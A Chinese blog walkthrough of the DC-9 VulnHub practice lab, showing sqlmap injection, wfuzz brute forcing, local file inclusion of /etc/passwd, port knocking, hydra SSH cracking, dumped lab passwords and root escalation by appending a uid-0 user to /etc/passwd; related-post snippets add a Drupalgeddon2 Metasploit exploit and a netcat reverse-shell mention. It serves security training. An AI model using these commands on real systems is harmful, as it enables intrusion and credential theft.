DC-9 靶场

最新推荐文章于 2024-09-27 20:30:07 发布
原创 最新推荐文章于 2024-09-27 20:30:07 发布 · 922 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全

 靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw
提取码:c5ur

 1.主机发现

nmap -sP 192.168.128.1/24
arp-scan -l               #得到IP    192.168.128.131

2.端口扫描

nmap -p 1-65535 -A 192.168.128.131        # 22 80端口

 3.目录扫描

dirb http://192.168.128.131
或者nikto -host 192.168.128.131    这个查询到了config.php   但是打不开

 4.操作网站找信息

#发现查询点:
万能密码注入尝试:' or 1=1 -- -
#F12看到是post请求,抓包看到search参数
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" --dbs    查看所有的库名
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users --tables
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --columns
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --dump
这里更推荐直接全部dump 
##notepad可以直接按住alt区域选择复制,这样可以把很多的账密分开做成字典。
#暴力破解:WFuzz
wfuzz -z file,name.txt -z file,password.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php #这里POST请求必须使用 -d   
wfuzz -z file,name.txt -z file,passwd.txt --hw 93 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
wfuzz -z file,name.txt -z file,passwd.txt --hh 1248 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
#没找到
**#尝试第二个数据库 Staff的信息。**
sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D Staff -T Users  --dump
#找参数    #尝试了hw hh 的过滤方式,找不到对应的参数。  FUZZ后面带文件名(index.php,etc/passwd等),不带都尝试,考虑是字典还是参数不对。最后,想到回到根目录的   etc/passwd  使用../  
wfuzz -b 'PHPSESSID=in952k2in45a06pcdmht1aepi3' --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.128.131/manage.php?FUZZ=../../../../../../etc/passwd

 5.爆破登录

#看到很多操作系统账号密码。这里爆破操作系统的账号密码。但是并不行
hydra -L name.txt -P passwd.txt 192.168.128.131 ssh  
**#22端口打开了,但是不能连接的原因?**
**1. 防护墙**
**2.所选用户不能使用22端口登录**
**3.linux服务:敲门 Knockd,确认方式:文件位置    /etc/knockd.conf    访问文件看到7469 **
**#用nmap对应敲门,只要访问了,就会打开的端口**
**nmap -p 7469 192.168.128.131**
**nmap -p 8475 192.168.128.131**
**nmap -p 9842 192.168.128.131**
#再次使用hydra爆破:  这里发现保存的字典,不能有任何空格
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
#登录
ssh janitor@192.168.128.131 输入密码即可
#登录成功还是老操作。看东西:
1. history
2. ls -a 
3。 sudo -l
#发现密码,放到字典。继续hydra爆破:
hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
**#登录成功,重复操作,sudo -l有信息:以root的身份执行操作程序**
./opt/devstuff/dist/test/test   执行   #python test.py read append   读取内容追加内容的意思
#怎么找test.py的文件位置?
find / - name "test.py" 
find / -name "test.py" 2>/dev/null   # 2代表标准错误输出,过滤到某地
cat /opt/devstuff/test.py

 6.提取

#/etc/passwd的文件格式:密码是x的原因,在/etc/shadow里面,放在etc/passwd也可以
#第三位和第四位的数字是uid和gid,root用户是0 
#第五位是用户描述,第六位是用户的工作目录,第七位命令 解释程序(执行命令的工具)
**这里提取思路:创建一个用户    把uid和gid都设为0即可,加密方式得是hash加密。利用python的脚本,追加到test.py**
openssl passwd  -1 -salt  admin 123456       $1$admin$LClYcRe.ee8dQwgrFc5nz.
完整的账密应该是:  admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash    最后的解释脚本目录
在有权限的用户的下输入  echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
sudo ./test /tmp/passwd  /etc/passwd 
#可以看到新增了一个用户
cat /etc/passwd  
su root
输入密码

7.笔记本:(记录收集到的信息和思路)

22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))   #有apache   有/var/www目录
网页主页有一堆个人信息
目录扫描:
==> DIRECTORY: http://192.168.128.131/css/                                                                          
==> DIRECTORY: http://192.168.128.131/includes/   #没用

+---------------+-----------+
| password      | username  |
+---------------+-----------+
| 3kfs86sfd     | marym     |
| 468sfdfsd2    | julied    |
| 4sfd87sfd1    | fredf     |
| RocksOff      | barneyr   |
| TC&TheBoyz    | tomc      |
| B8m#48sd      | jerrym    |
| Pebbles       | wilmaf    |
| BamBam01      | bettyr    |
| UrAG0D!       | chandlerb |
| Passw0rd      | joeyt     |
| yN72#dsd      | rachelg   |
| ILoveRachel   | rossg     |
| 3248dsds7s    | monicag   |
| smellycats    | phoebeb   |
| YR3BVxxxw87   | scoots    |
| Ilovepeepee   | janitor   |
| Hawaii-Five-0 | janitor2  |
+---------------+-----------+
第一个数据库账密不行     换数据库查
admin  transorbital1
看到一个。。。。**File does not exist  **
**考虑考虑文件包含---》找参数。。**
这里**注意:在登录时找参数,所以,直接用wfuzz找参数是一个没登陆的状态。带上cookie值,才是以登录的状态查找cookie值**
参数为     "file"

[22][ssh] host: 192.168.128.131   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.128.131   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.128.131   login: janitor   password: Ilovepeepee
后面收集到的
login: fredf   password: B4-Tru3-001

import sys


if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)


else :
    f = open(sys.argv[1], "r")
    output = (f.read())


    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
读取任意文件内容,追加到任意文件中去
vulnhub靶场DC-9
kukudeshuo的博客
07-17 1189
vulnhub靶场DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-9(192.168.58.155) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
vulnhub靶场DC-9
qq_58091216的博客
01-15 1484
发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件。这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考。
Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2874
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
DC-9靶场
mlws1900的博客
03-29 1537
发现靶机的ip地址为192.168.111.137,攻击机(kali)的ip地址为192.168.111.128。,而且需要按照顺序‘敲’端口。登录成功,下面显示file does not exist ,怀疑包含了某文件,所以尝试文件包含。将这一串密码加入刚刚的爆破密码中,重新进行爆破,生成newpass.txt。openssl生成密码,前一个mlws为账号,后一个1900为要加密的密码。发现代码作用需要两个文件,把第一文件追加到第二个文件后。使用test文件,将该文件的内容写入到passwd中。
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 2237
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第一个练习环境。DC1靶场通常包含一系列的关卡,每一个关卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场通关详细...
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 7550
dc-9靶场详细渗透过程
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1649
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC-2靶场详细教程
2301_77518341的博客
09-27 2603
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
DC-9靶场实战
qq_42754807的博客
03-20 1344
DC-9靶场实战
靶场练习第十七天~vulnhub靶场dc-9
qq_57976347的博客
02-16 951
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
DC9靶场渗透
qq_20032803的博客
02-03 806
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 691
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
Vulnhub DC-9靶场
weixin_47019868的博客
11-25 246
Vulnhub DC-9靶场
DC渗透系列】DC-9靶场
xydsg的博客
02-01 764
我这里使用无糖的软件直接扫。
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2325
vulnhub靶场渗透练习详解——DC9
vulnhub之DC9靶机
LainWith的博客
02-15 3598
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
渗透测试学习之靶机DC-9
情感博主V
03-17 1985
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.146 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.146 web站点相关服务信息 目录信息 注:不要试着访问welcome.php、session.php和addrecord.php不然会直接跳到登录后的页面,但是并不能做...
DC-1靶场
最新发布
03-21
<think>好的,我现在需要帮助用户查找与DC-1靶场相关的IT内容或项目。首先,用户提供的引用中有提到DC-1渗透靶场实战速通版,引用[4]提到了一些具体步骤,比如退出数据库、查看用户信息等。这可能意味着DC-1是一个用于渗透测试练习的靶机,常见于网络安全训练中。 接下来,我需要确认DC-1靶场的基本信息。通常,像DC-1这样的靶场是设计用来模拟真实环境中的漏洞,供安全研究人员和爱好者练习渗透测试技术。根据引用[3],里面提到了Drupal 8、PHP、Apache、Debian系统,这些可能是DC-1靶场使用的技术栈。用户可能想知道靶场的技术实现细节,比如包含哪些漏洞,如何搭建,或者如何利用这些漏洞进行渗透。 然后,我需要检查用户提供的引用是否有其他相关信息。引用[1]是关于加入技术社群的,引用[2]看起来像是一个反向shell的命令,可能与渗透测试中的利用方法有关,而引用[4]提到了具体的渗透步骤,如查看/etc/passwd文件,这可能涉及到用户枚举或权限提升的环节。 用户的问题是要查找与DC-1靶场相关的IT项目或技术实现,所以需要整理这些信息,说明DC-1靶场可能涉及的技术组件、漏洞类型以及渗透测试的方法。例如,Drupal可能存在已知漏洞,如CVE-2018-7600,Apache的版本可能有配置问题,Debian系统可能涉及内核漏洞等。此外,用户可能对如何搭建这样的靶场或进行实战演练感兴趣,所以需要涵盖搭建步骤和渗透路径。 另外,需要确保回答符合系统级指令,比如使用正确的中文,数学公式的格式(虽然这里可能用不到),以及生成相关问题。同时,引用需要正确标注,比如引用[3]和[4]中的信息。 最后,生成的相关问题需要围绕DC-1靶场的技术细节、渗透方法、漏洞分析以及学习资源展开,帮助用户进一步探索。</think>关于DC-1靶场的技术实现与应用,以下是关键信息整理: ### DC-1靶场概述 DC-1是专为渗透测试训练设计的虚拟机靶场,模拟了包含多个漏洞的Web应用环境。其核心组件包括: - **CMS系统**:Drupal 8(存在CVE-2018-7600远程代码执行漏洞)[^3] - **Web服务**:Apache HTTP Server 2.4.25 - **操作系统**:Debian Linux - **数据库**:MySQL/MariaDB(通过`tac /etc/passwd`可发现数据库用户信息)[^4] ### 渗透测试路径示例 1. **漏洞利用**:通过Drupalgeddon2漏洞获取初始立足点 ```bash msfconsole> use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS <靶机IP> exploit ``` 2. **权限提升**:利用Linux内核漏洞或SUID提权(如发现`find`命令具有SUID权限): ```bash find / -exec /bin/sh \; -quit ``` 3. **敏感信息获取**:通过`/etc/passwd`分析用户列表,`/var/www`目录查找数据库凭证 ### 技术实现特点 - **多层防御突破**:包含Web应用漏洞、操作系统配置缺陷、数据库安全防护等复合型漏洞 - **真实环境模拟**:采用LAMP架构(Linux+Apache+MySQL+PHP)构建企业级应用场景 - **隐蔽后门设计**:存在可通过`nc 192.168.233.130 55555`建立反向Shell的网络通道[^2]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值